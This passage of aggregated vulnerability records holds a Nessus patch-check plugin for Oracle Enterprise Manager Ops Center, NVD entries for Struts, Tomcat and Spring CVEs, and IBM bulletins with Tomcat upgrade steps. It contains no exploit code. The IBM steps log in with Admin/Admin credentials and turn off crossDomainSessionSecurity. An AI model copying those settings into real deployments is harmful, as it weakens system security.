FileUpload allows for remote code execution.\n (CVE-2016-1000031)\n\n - An information 
disclosure vulnerability exists in OpenSSL\n due to the potential for a side-channel timing attack.\n An unauthenticated attacker can exploit this to disclose\n potentially sensitive information. (CVE-2018-0734)\n\n - A denial of service (DoS) vulnerability exists in Apache\n HTTP Server 2.4.17 to 2.4.34, due to a design error. An\n unauthenticated, remote attacker can exploit this issue\n by sending continuous, large SETTINGS frames to cause a\n client to occupy a connection, server thread and CPU\n time without any connection timeout coming to effect.\n This affects only HTTP/2 connections. A possible\n mitigation is to not enable the h2 protocol.\n (CVE-2018-11763).\n\n - Networking component of Enterprise Manager Base Platform\n (Spring Framework) is easily exploited and may allow an\n unauthenticated, remote attacker to takeover the\n Enterprise Manager Base Platform. (CVE-2018-1258)\n\n\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9166970d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2019\nOracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1000031\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager_ops_center\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_ops_center_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Ops Center\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\napp_name = 'Oracle Enterprise Manager Ops Center';\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nversion_full = install['Full Patch Version'];\npath = install['path'];\npatch_version = install['Patch Version'];\n\n\npatchid = NULL;\nfix = NULL;\n\nif (version_full =~ \"^12\\.3\\.3\\.\")\n{\n patchid = '29623885';\n fix = '1819';\n} \n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\nif (ver_compare(ver:patch_version, fix:fix, strict:FALSE) != -1)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version_full, path);\n\nreport = \n '\\n Path : ' + path + \n '\\n Version : ' + version + \n '\\n Ops Agent Version : ' + version_full + \n '\\n Current Patch : ' + patch_version + \n '\\n Fixed Patch Version : ' + fix +\n '\\n Fix : ' + patchid;\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T02:30:07", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when 
alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-06-12T07:15:00", "id": "PRION:CVE-2018-11776", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T02:52:04", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. 
It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2018-05-16T16:29:00", "type": "prion", "title": "Default configuration", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2019-10-03T00:03:00", "id": "PRION:CVE-2018-8014", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-8014", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T02:31:25", "description": "Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. 
An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T20:29:00", "type": "prion", "title": "Authorization", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2022-04-11T17:18:00", "id": "PRION:CVE-2018-1258", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-1258", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-21T21:47:28", "description": "## Summary\n\nIBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10.1.4-10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10.1.4 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p413_Apache-Struts-Vulnerability-Fix&source=SAR&function=fixId&parent=IBM%20Security \nIBM Security Guardium | 10.5 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&fixids=SqlGuard_10.0p512_Sep-24-2018&source=SAR&function=fixId&parent=IBM%20Security \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-28T04:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-28T04:30:01", "id": "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "href": "https://www.ibm.com/support/pages/node/732783", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T06:16:22", "description": "## Summary\n\nThis interim fix provides instructions on upgrading Apache Tomcat from v5.5.36 to v7.0.90 in IBM Platform Symphony 6.1.1 and from v6.0.43 to v8.5.32 in IBM Platform Symphony 7.1 Fix Pack 1 in order to address security vulnerability CVE-2018-8014 in Tomcat. \n\n## Vulnerability Details\n\nCVE-ID: CVE-2018-8014 \nDescription: Apache Tomcat could provide weaker than expected security, caused by insecure default settings for the CORS filter. A remote attacker could exploit this vulnerability to launch further attacks on the system. 
\nCVSS Base Score: 5.3 \nCVSS Temporal Score: https://exchange.xforce.ibmcloud.com/vulnerabilities/143411 for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nPlatform Symphony 6.1.1 \nPlatform Symphony 7.1 Fix Pack 1\n\n## Remediation/Fixes\n\n**Applicability** \nOperating systems: Linux2.6-glibc2.3-x86_64 \nCluster type: Single grid cluster \n**Packages**\n\n**_Product_** | **_APAR_** | _**Remediation/First Fix** _ \n---|---|--- \n_IBM Platform Symphony 6.1.1_ | _P102656_ | \n\n[_sym6.1.1_lnx26-lib23-x64_build497567.tar.gz_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-6.1.1-build497567&includeSupersedes=0>) \n \n_IBM Platform Symphony 7.1 Fix Pack 1_ | _P102656_ | \n\n[_sym7.1_lnx26-lib23-x64_build497568.tar.gz_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/Platform+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.1-build497568&includeSupersedes=0>) \n \n_Apache Tomcat 7.0.90_ | _N/A_ | \n\n[_apache-tomcat-7.0.90.tar.gz_](<http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz>) \n \n_Apache Tomcat 8.5.32_ | _N/A_ | \n\n[_apache-tomcat-8.5.32.tar.gz_](<http://archive.apache.org/dist/tomcat/tomcat-8/v8.5.32/bin/apache-tomcat-8.5.32.tar.gz>) \n \n## _**For Platform Symphony 6.1.1**_\n\n### **Optional prerequisite**\n\nFor a Platform Symphony 6.1.1 cluster, you can optionally take advantage of a security service pack. To apply this interim fix along with the security service pack:\n\n 1. 
Install the service pack ([sym-6.1.1-spk-Security-build227853](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=Platform+Computing&product=ibm/Other+software/Platform+Symphony&release=6.1.1&platform=All&function=fixId&fixids=sym-6.1.1-spk-Security-build227853&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)).\n\n 2. Apply this interim fix (_sym6.1.1_lnx26-lib23-x64_build497567.tar.gz_) to your cluster.\n\nIf you do not want to apply the 6.1.1 security service pack, proceed to directly apply this interim fix to your cluster.\n\n### **Installation**\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -x Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. Log on to each management host in the cluster and back up the following files for recovery purposes: \n$EGO_TOP/gui/1.2.8/tomcat/ \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml \n$EGO_TOP/gui/ego/1.2.8/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/6.1.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/1.2.8/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/soamgui/WEB-INF/web.xml\n\n 3. On each management host, copy the _apache-tomcat-7.0.90.tar.gz_ package to a temporary folder and decompress the file: \n> cp apache-tomcat-7.0.90.tar.gz /tmp \n> tar zxvf apache-tomcat-7.0.90.tar.gz \n> rm -rf apache-tomcat-7.0.90/conf/ \n> rm -rf apache-tomcat-7.0.90/work/ \n> rm -rf apache-tomcat-7.0.90/logs/\n\n 4. Copy the Tomcat folder: \n> rm -rf $EGO_TOP/gui/1.2.8/tomcat \n> cp -rf apache-tomcat-7.0.90 $EGO_TOP/gui/1.2.8/tomcat\n\n 5. Copy the _sym6.1.1_lnx26-lib23-x64_build497567.tar.gz_ package and decompress it: \n> tar zxfo sym6.1.1_lnx26-lib23-x64_build497567.tar.gz -C $EGO_TOP\n\n 6. 
If you ran the \u201c**egoconfig mghost **_shared_dir_\u201d command during installation to set up a shared location for configuration files, ensure that the configuration file is changed in the shared directory: \n> cp $EGO_TOP/gui/conf/catalina.policy $EGO_CONFDIR/../../gui/conf/catalina.policy \n> cp $EGO_TOP/gui/conf/catalina.properties $EGO_CONFDIR/../../gui/conf/catalina.properties \n> cp $EGO_TOP/gui/conf/server.xml $EGO_CONFDIR/../../gui/conf/server.xml\n\n 7. If you modified the _$EGO_CONFDIR/../../gui/conf/server.xml_ configuration file for details such as the GUI service port, manually redo those changes.\n\n 8. Edit the _web.xml_ files to add the following configuration:\n\n 1. Edit each of the following files: \n$EGO_TOP/gui/ego/1.2.8/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/6.1.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/1.2.8/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/soamgui/WEB-INF/web.xml\n\n 2. Find the \u201c<servlet-name>dwr-invoker</servlet-name>\u201d line in the \u201c</servlet>\u201d section and add the following configuration: \n<init-param> \n<param-name>**crossDomainSessionSecurity**</param-name> \n<param-value>**false**</param-value> \n</init-param> \nFor example: \n<servlet> \n<servlet-name>dwr-invoker</servlet-name> \n<servlet-class>org.directwebremoting.servlet.DwrServlet</servlet-class> \n<init-param> \n<param-name>debug</param-name> \n<param-value>true</param-value> \n</init-param> \n**<init-param>** \n** <param-name>crossDomainSessionSecurity</param-name>** \n**<param-value>false</param-value>** \n** </init-param**> \n</servlet>\n\n 9. On each management host, delete all subdirectories and files in the _gui/work_ directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 10. On all client hosts, open your web browser and clear the browser cache.\n\n 11. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n 12. 
In the _$EGO_TOP/gui/logs/catalina.out_ file, check whether the GUI version indicates version 7.0.90: \nINFO: Server version: Apache Tomcat/7.0.90\n\n### **Uninstallation**\n\nFollow the instructions in this section to uninstall this update in your cluster, if required.\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -X Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. On each management host, restore the backup files: \n 1. Remove the Tomcat folder, which was introduced by this interim fix: \n> rm -rf $EGO_TOP/gui/1.2.8/tomcat\n\n 2. Restore the following folders and files from your backup: \n$EGO_TOP/gui/1.2.8/tomcat/ \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml \n$EGO_TOP/gui/ego/1.2.8/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/6.1.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/1.2.8/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/6.1.1/soamgui/WEB-INF/web.xml\n\n 3. Delete all subdirectories and files in the following directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 4. On all client hosts, open your web browser and clear the browser cache.\n\n 5. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n## _**For Platform Symphony 7.1 Fix Pack 1**_\n\n**Installation**\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -x Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. 
Log on to each management host in the cluster and back up the following files for recovery purposes: \n$EGO_TOP/gui/3.1/tomcat/ \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml$EGO_TOP/gui/ego/3.1/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/7.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/3.1/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/soamgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/symgui/WEB-INF/web.xml\n\n 3. Copy the _apache-tomcat-8.5.32.tar.gz_ package to a temporary folder and decompress the file: \n> cp apache-tomcat-8.5.32.tar.gz /tmp \n> tar zxvf apache-tomcat-8.5.32.tar.gz \n> rm -rf apache-tomcat-8.5.32/conf/ \n> rm -rf apache-tomcat-8.5.32/work/ \n> rm -rf apache-tomcat-8.5.32/logs/\n\n 4. Copy the Tomcat folder: \n> rm -rf $EGO_TOP/gui/3.1/tomcat \n> cp -rf apache-tomcat-8.5.32 $EGO_TOP/gui/3.1/tomcat\n\n 5. Copy the _sym7.1_lnx26-lib23-x64_build497568.tar.gz_ package and decompress it: \n> tar zxfo sym7.1_lnx26-lib23-x64_build497568.tar.gz -C $EGO_TOP\n\n 6. If you ran the \u201c**egoconfig mghost **_shared_dir_\u201d command during installation to set up a shared location for configuration files, ensure that the configuration file is changed in the shared directory: \n> cp $EGO_TOP/gui/conf/catalina.policy $EGO_CONFDIR/../../gui/conf/catalina.policy \n> cp $EGO_TOP/gui/conf/catalina.properties $EGO_CONFDIR/../../gui/conf/catalina.properties \n> cp $EGO_TOP/gui/conf/server.xml $EGO_CONFDIR/../../gui/conf/server.xml\n\n 7. If you modified the _$EGO_CONFDIR/../../gui/conf/server.xml_ configuration file for details such as the GUI service port, manually redo those changes.\n\n 8. Edit the _web.xml_ files to add the following configuration:\n\n 1. 
Edit each of the following files: \n$EGO_TOP/gui/ego/3.1/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/7.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/3.1/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/symgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/soamgui/WEB-INF/web.xml\n\n 2. Find the \u201c<servlet-name>dwr-invoker</servlet-name>\u201d line in the \u201c</servlet>\u201d section and add the following configuration: \n<init-param> \n<param-name>**crossDomainSessionSecurity**</param-name> \n<param-value>**false**</param-value> \n</init-param> \nFor example: \n<servlet> \n<servlet-name>dwr-invoker</servlet-name> \n<servlet-class>org.directwebremoting.servlet.DwrServlet</servlet-class> \n<init-param> \n<param-name>debug</param-name> \n<param-value>true</param-value> \n</init-param> \n**<init-param> \n<param-name>crossDomainSessionSecurity</param-name> \n<param-value>false</param-value> \n</init-para**m> \n</servlet>\n\n 9. On each management host, delete all subdirectories and files in the following directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 10. On all client hosts, open your web browser and clear the browser cache.\n\n 11. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n 12. In the _$EGO_TOP/gui/logs/catalina.out_ file, check whether the GUI version indicates version 8.5.32: \nINFO: Server version: Apache Tomcat/8.5.32\n\n### **Uninstallation**\n\nFollow the instructions in this section to uninstall this update in your cluster, if required.\n\n 1. Log on to the primary management host as the cluster administrator and stop the WEBGUI service: \n> egosh user logon -u Admin -x Admin \n> source $EGO_TOP/cshrc.platform \n> egosh service stop WEBGUI\n\n 2. On each management host, restore the backup files:\n\n 1. Remove the Tomcat folder, which was introduced by this interim fix: \n> rm -rf $EGO_TOP/gui/3.1/tomcat\n\n 2. 
Restore the following folders and files from your backup: \n$EGO_TOP/gui/3.1/tomcat \n$EGO_CONFDIR/../../gui/conf/catalina.policy \n$EGO_CONFDIR/../../gui/conf/catalina.properties \n$EGO_CONFDIR/../../gui/conf/server.xml \n$EGO_TOP/gui/ego/3.1/platform/WEB-INF/web.xml \n$EGO_TOP/gui/is/7.1/isgui/WEB-INF/web.xml \n$EGO_TOP/gui/perf/3.1/perfgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/soamgui/WEB-INF/web.xml \n$EGO_TOP/gui/soam/7.1/symgui/WEB-INF/web.xml\n\n 3. Delete all subdirectories and files in the following directory: \n> rm -rf $EGO_TOP/gui/work/*\n\n 4. On all client hosts, open your web browser and clear the browser cache.\n\n 5. Start the WEBGUI service: \n> source $EGO_TOP/cshrc.platform \n> egosh service start WEBGUI\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T13:53:27", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Tomcat affects IBM Platform Symphony", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2021-09-01T13:53:27", "id": 
"48E2F14694E188398670F80EC3BDC38DA8366A97A8AABAF5E6501E5BCF31228E", "href": "https://www.ibm.com/support/pages/node/718917", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T18:17:25", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system. \n \n\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. 
\nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2.\n\nSupported code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \nFlashSystem 840 MTMs:\n\n9840-AE1 & 9843-AE1\n\nFlashSystem 900 MTMs:\n\n9840-AE2, 9843-AE2, 9840-AE3, & 9843-AE3\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n| N/A | FlashSystem 840 fixes and FlashSystem900 fixes are available @ [IBM's Fix Central](<https://www-945.ibm.com/support/fixcentral>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-02-18T01:45:50", "id": "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "href": 
